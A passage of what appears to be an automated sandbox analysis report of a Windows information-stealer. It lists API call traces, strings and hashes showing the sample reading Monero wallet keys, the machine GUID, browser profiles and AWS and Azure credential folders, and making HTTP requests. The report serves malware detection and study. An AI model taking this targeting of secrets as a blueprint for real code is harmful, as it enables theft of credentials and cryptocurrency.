                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Filelstrcpy$lstrcat$AllocCreateHeaplstrlenmemset$CloseCopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
                                                                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                • API String ID: 2725398440-218353709
                                                                                • Opcode ID: e9d5ebe04bd7bc58995d170363b86178bbbe3cf24575e7001856d206ab765175
                                                                                • Instruction ID: 901e0a47ee0b89a43ddfaf22904e5be17bd7688e420c1fcef0611cd27edb7556
                                                                                • Opcode Fuzzy Hash: e9d5ebe04bd7bc58995d170363b86178bbbe3cf24575e7001856d206ab765175
                                                                                • Instruction Fuzzy Hash: 06715D71D00248EACB14EBE4D956BDDBBB8AF18308F54407EE505B31C2DE78264CCB69
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00410076
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004262C7,00000001,00000000), ref: 004100BE
                                                                                • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
                                                                                • wsprintfA.USER32 ref: 00410132
                                                                                • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
                                                                                • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
                                                                                • lstrlenA.KERNEL32(?), ref: 0041018E
                                                                                • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,004262F0), ref: 0041020E
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
                                                                                • String ID: - $%s\%s$?
                                                                                • API String ID: 404191982-3278919252
                                                                                • Opcode ID: 31e2b9dd4df46e591392e58f3efde1d97b51e578d32717b35a6573e8f202f5e3
                                                                                • Instruction ID: 7ab7514c44e0da1f2f7805acf3a1e45dd26abe84cf75324248915fb0e6202ea1
                                                                                • Opcode Fuzzy Hash: 31e2b9dd4df46e591392e58f3efde1d97b51e578d32717b35a6573e8f202f5e3
                                                                                • Instruction Fuzzy Hash: 087102B190021DEEDF11EBE1CD84EEEBBB9BB18304F50417AE905B2151DB785A88CB65
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040F68E
                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 0040F6A4
                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 0040F6C6
                                                                                • memset.MSVCRT ref: 0040F708
                                                                                • ??_V@YAXPAX@Z.MSVCRT ref: 0040F841
                                                                                  • Part of subcall function 0040E156: strlen.MSVCRT ref: 0040E16D
                                                                                  • Part of subcall function 0040DD10: memcpy.MSVCRT ref: 0040DD30
                                                                                Strings
                                                                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040F720, 0040F809
                                                                                • N0ZWFt, xrefs: 0040F7AB, 0040F7B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • API ID: H_prologOpenProcessmemcpymemsetstrlen
                                                                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                • API String ID: 3050127167-1622206642
                                                                                • Opcode ID: 6d550b47649cbc074e826e347ff90771797366bbdea03ead8e58419020fff812
                                                                                • Instruction ID: d92978c317b697945912aa173a1e05ead718c9e6d1350f194c4815b503896aae
                                                                                • Opcode Fuzzy Hash: 6d550b47649cbc074e826e347ff90771797366bbdea03ead8e58419020fff812
                                                                                • Instruction Fuzzy Hash: A8517E71900219AEDB20EB94DC81AEEBBB9EF04314F20017FF114B66C1DB795E88CB59
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004104E2
                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                • wsprintfA.USER32 ref: 004105AD
                                                                                • lstrcat.KERNEL32(00000000,004262A0), ref: 004105BC
                                                                                  • Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004105DB
                                                                                  • Part of subcall function 00411154: malloc.MSVCRT ref: 00411162
                                                                                  • Part of subcall function 00411154: strncpy.MSVCRT ref: 00411172
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00410608
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                • String ID: :\$C
                                                                                • API String ID: 688099012-3309953409
                                                                                • Opcode ID: 416253e965eb42c759364b255e4ecd1a0613b221ded167edafa7b177bf4c383f
                                                                                • Instruction ID: 84e118196ac0f38cbb6e09dfb40efd972d04435529832d229da92da0b26732ed
                                                                                • Opcode Fuzzy Hash: 416253e965eb42c759364b255e4ecd1a0613b221ded167edafa7b177bf4c383f
                                                                                • Instruction Fuzzy Hash: 8E418071801158ABCB11EBE5DD89EEFBBBDEF4A304F10006EF505A3141EA785A48CBB5
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0041311D
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                                  • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                  • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                  • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                  • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                  • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                  • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                  • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004131B6
                                                                                  • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                • StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004131F2
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0041320D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                • API String ID: 3807055897-1526165396
                                                                                • Opcode ID: d0459109369f2f4c7748f439c483f4eaf3f7582e003e90059872d5f537bb727b
                                                                                • Instruction ID: 555d10d1ffafafdd123518b884250a5375e6a4b62cd9d48d02a2f87644db10f1
                                                                                • Opcode Fuzzy Hash: d0459109369f2f4c7748f439c483f4eaf3f7582e003e90059872d5f537bb727b
                                                                                • Instruction Fuzzy Hash: 7141A6B1900258EACB11FFA1D956FDDB7B4AF18708F10007FE90173182DB386B488A6A
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040ED0D
                                                                                • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED51
                                                                                • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EDC5
                                                                                • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EEE1
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 0040D3FA: _EH_prolog.MSVCRT ref: 0040D3FF
                                                                                  • Part of subcall function 0040B8AF: _EH_prolog.MSVCRT ref: 0040B8B4
                                                                                • StrCmpCA.SHLWAPI(00000000), ref: 0040EFB0
                                                                                • StrCmpCA.SHLWAPI(00000000), ref: 0040F025
                                                                                • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040F140
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpy
                                                                                • String ID: Stable\$ Stable\$firefox
                                                                                • API String ID: 2120869262-2697854757
                                                                                • Opcode ID: cbc591070e23e547dad82c25336e79ec262d8277c697555a2c597f71d100fc77
                                                                                • Instruction ID: 1d26c69091b310833a01da009a7ea8e67b8bedb29d0866ac6f751b535dc35178
                                                                                • Opcode Fuzzy Hash: cbc591070e23e547dad82c25336e79ec262d8277c697555a2c597f71d100fc77
                                                                                • Instruction Fuzzy Hash: 70E19171D00249EADF10FBB9D956BDDBFB4AB09304F10817AE80477682DB78570C8BA6
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00404DCF
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                  • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                  • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                                                                • StrCmpCA.SHLWAPI(?), ref: 00404E38
                                                                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                                                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
                                                                                • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                                                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                                                                • InternetCloseHandle.WININET(?), ref: 00404EF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
                                                                                • String ID:
                                                                                • API String ID: 2737972104-0
                                                                                • Opcode ID: 88829cdbc13eaa028feb7f2b605196d4632ef8e36c7567f8413ee27c5444be14
                                                                                • Instruction ID: b48a0b941aae4b8094d1842ee2058a608b59a9df84dda5b7ed82bcf6dbc203b8
                                                                                • Opcode Fuzzy Hash: 88829cdbc13eaa028feb7f2b605196d4632ef8e36c7567f8413ee27c5444be14
                                                                                • Instruction Fuzzy Hash: D6413CB1800119AFDB20EBA0DC45FEE7BBDFB45304F10447AFA15B2191D7385A498BA5
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041043B
                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,NeB,?,?,00000000), ref: 00410457
                                                                                • RegQueryValueExA.KERNEL32(NeB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
                                                                                • CharToOemA.USER32(?,?), ref: 00410493
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CharOpenQueryValuememset
                                                                                • String ID: MachineGuid$NeB$SOFTWARE\Microsoft\Cryptography
                                                                                • API String ID: 1728412123-1973151993
                                                                                • Opcode ID: 8a42b9606ce94e91a3aee8c6c2ec702ea9be6fa22a3d7d9db661520a3802ec5d
                                                                                • Instruction ID: e049fcdf3dccc2042a1c1aa5727c33f1d227b0b17948d6a14ccc4f9ac1de0051
                                                                                • Opcode Fuzzy Hash: 8a42b9606ce94e91a3aee8c6c2ec702ea9be6fa22a3d7d9db661520a3802ec5d
                                                                                • Instruction Fuzzy Hash: 8A014F7590421DFFEB10DB90DC89FEAB77CEB18708F5000A5B644E2051EAB45FC88B60
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00416964
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 004134FD: _EH_prolog.MSVCRT ref: 00413502
                                                                                  • Part of subcall function 004135AC: _EH_prolog.MSVCRT ref: 004135B1
                                                                                  • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                  • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32(75900000,00416AAC), ref: 00417659
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417670
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417687
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041769E
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176B5
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176CC
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176E3
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176FA
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417711
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417728
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041773F
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417756
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041776D
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417784
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041779B
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177B2
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177C9
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177E0
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177F7
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041780E
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417825
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041783C
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417853
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041786A
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,5A&6A,?,004265BB,00000000,?,00000040,00000064,0041366A,00412D12,?,0000002C,00000064), ref: 00416B55
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0041390C: _EH_prolog.MSVCRT ref: 00413911
                                                                                  • Part of subcall function 0041390C: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B5E
                                                                                  • Part of subcall function 00413295: _EH_prolog.MSVCRT ref: 0041329A
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416C3A
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416C56
                                                                                  • Part of subcall function 004104DD: _EH_prolog.MSVCRT ref: 004104E2
                                                                                  • Part of subcall function 004104DD: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                  • Part of subcall function 004104DD: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                  • Part of subcall function 004104DD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                  • Part of subcall function 004104DD: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                  • Part of subcall function 00403AF5: _EH_prolog.MSVCRT ref: 00403AFA
                                                                                  • Part of subcall function 00403AF5: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
                                                                                  • Part of subcall function 00403AF5: StrCmpCA.SHLWAPI(?), ref: 00403BBC
                                                                                  • Part of subcall function 00411CD8: _EH_prolog.MSVCRT ref: 00411CDD
                                                                                  • Part of subcall function 00411CD8: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00416CD7), ref: 00411CFF
                                                                                  • Part of subcall function 00411CD8: ExitProcess.KERNEL32 ref: 00411D0A
                                                                                  • Part of subcall function 0040ED08: _EH_prolog.MSVCRT ref: 0040ED0D
                                                                                  • Part of subcall function 0040ED08: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED51
                                                                                  • Part of subcall function 0040ED08: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EDC5
                                                                                  • Part of subcall function 0040514C: _EH_prolog.MSVCRT ref: 00405151
                                                                                  • Part of subcall function 0040514C: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
                                                                                  • Part of subcall function 0040514C: StrCmpCA.SHLWAPI(?), ref: 00405213
                                                                                  • Part of subcall function 004117C4: _EH_prolog.MSVCRT ref: 004117C9
                                                                                  • Part of subcall function 004117C4: strtok_s.MSVCRT ref: 004117F0
                                                                                  • Part of subcall function 004117C4: StrCmpCA.SHLWAPI(00000000,00426570,?,?,?,?,00416EC0), ref: 00411821
                                                                                  • Part of subcall function 004117C4: strtok_s.MSVCRT ref: 00411882
                                                                                  • Part of subcall function 00401ED6: _EH_prolog.MSVCRT ref: 00401EDB
                                                                                  • Part of subcall function 004165D9: _EH_prolog.MSVCRT ref: 004165DE
                                                                                  • Part of subcall function 004165D9: lstrcat.KERNEL32(?,00000000), ref: 00416620
                                                                                  • Part of subcall function 004165D9: lstrcat.KERNEL32(?), ref: 0041663F
                                                                                  • Part of subcall function 00416791: _EH_prolog.MSVCRT ref: 00416796
                                                                                  • Part of subcall function 00416791: memset.MSVCRT ref: 004167B6
                                                                                  • Part of subcall function 00416791: lstrcat.KERNEL32(?,00000000), ref: 004167DC
                                                                                  • Part of subcall function 00416791: lstrcat.KERNEL32(?,\.azure\), ref: 004167F9
                                                                                  • Part of subcall function 00416791: memset.MSVCRT ref: 00416834
                                                                                  • Part of subcall function 00416791: lstrcat.KERNEL32(?,00000000), ref: 0041685F
                                                                                  • Part of subcall function 00416791: lstrcat.KERNEL32(?,\.aws\), ref: 0041687C
                                                                                  • Part of subcall function 00416791: memset.MSVCRT ref: 004168B7
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: AddressProc$H_prolog$lstrcat$lstrcpy$InternetOpen$memset$DirectoryHeapProcesslstrlenstrtok_s$AllocCreateExitInformationSystemTimeVolumeWindows
                                                                                • String ID: 5A&6A
                                                                                • API String ID: 1955031769-2983527881
                                                                                • Opcode ID: f56475e3e9353e3f899919c66131b9dca8b7c1d3b1fcd2b89d564be33ac666e9
                                                                                • Instruction ID: edbb1815c7422c7d311f49e837a4d97797ab122b1f4c92a9abc43992aef21044
                                                                                • Opcode Fuzzy Hash: f56475e3e9353e3f899919c66131b9dca8b7c1d3b1fcd2b89d564be33ac666e9
                                                                                • Instruction Fuzzy Hash: 8C4242B1D00358AADF10EBE5C946BDEBB78AF15304F5041AEF54573281DB781B888BA7
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00406190
                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                Similarity
                                                                                • API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 3869837436-0
                                                                                • Opcode ID: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                                • Instruction ID: 909566f9f53506b5aa2d8709c9cb46b640c87a2d020782bf56f99dd61eaf9922
                                                                                • Opcode Fuzzy Hash: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                                • Instruction Fuzzy Hash: 6E218B70A00115ABDB20AFA4DC48EAFBBB9FF95710F20056EF952E62D4D7389911CB64
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C), ref: 0040FF8F
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040FF96
                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 0040FFB6
                                                                                • wsprintfA.USER32 ref: 0040FFDC
                                                                                Similarity
                                                                                • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                • String ID: %d MB$@
                                                                                • API String ID: 3644086013-3474575989
                                                                                • Opcode ID: d58cec7bb25a44c408c3687956696a67a71d0eb3ae1938313e2b8797632a6eaa
                                                                                • Instruction ID: ca080bb329355c7b2013afa2bdf3b2efff8528aa9c5ce76f1778211d5c0869c6
                                                                                • Opcode Fuzzy Hash: d58cec7bb25a44c408c3687956696a67a71d0eb3ae1938313e2b8797632a6eaa
                                                                                • Instruction Fuzzy Hash: 8AF036B5A00218ABE7149BA4DC4AF7E76BEEB45705F400039F702E61C0D7B4D8058769
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00415CAA
                                                                                • memset.MSVCRT ref: 00415CD6
                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,?,00000000), ref: 00415CF3
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 00415D13
                                                                                • lstrcat.KERNEL32(?,?), ref: 00415D42
                                                                                • lstrcat.KERNEL32(?), ref: 00415D55
                                                                                Similarity
                                                                                • API ID: lstrcat$H_prologOpenQueryValuememset
                                                                                • String ID:
                                                                                • API String ID: 2333602472-0
                                                                                • Opcode ID: 5908ee0a41c72f3eb61dbe54366e8acb213d08ed70dfc70b307fc866011581ad
                                                                                • Instruction ID: b1237888a7669b0395c9cdb9a6d9471705cae356a33a5f6a680b3cc5b253afb1
                                                                                • Opcode Fuzzy Hash: 5908ee0a41c72f3eb61dbe54366e8acb213d08ed70dfc70b307fc866011581ad
                                                                                • Instruction Fuzzy Hash: 8F419DB1D4021DABCF10EFA0DC86EDD7B7DAF18344F00456AB618A2191E7399A858BD2
                                                                                APIs
                                                                                  • Part of subcall function 00417330: LoadLibraryA.KERNEL32(kernel32.dll,00417262), ref: 00417335
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041737A
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417391
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173A8
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173BF
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173D6
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173ED
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417404
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041741B
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417432
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417449
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417460
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417477
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041748E
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174A5
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174BC
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174D3
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174EA
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417501
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417518
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041752F
                                                                                  • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417540
                                                                                  • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417551
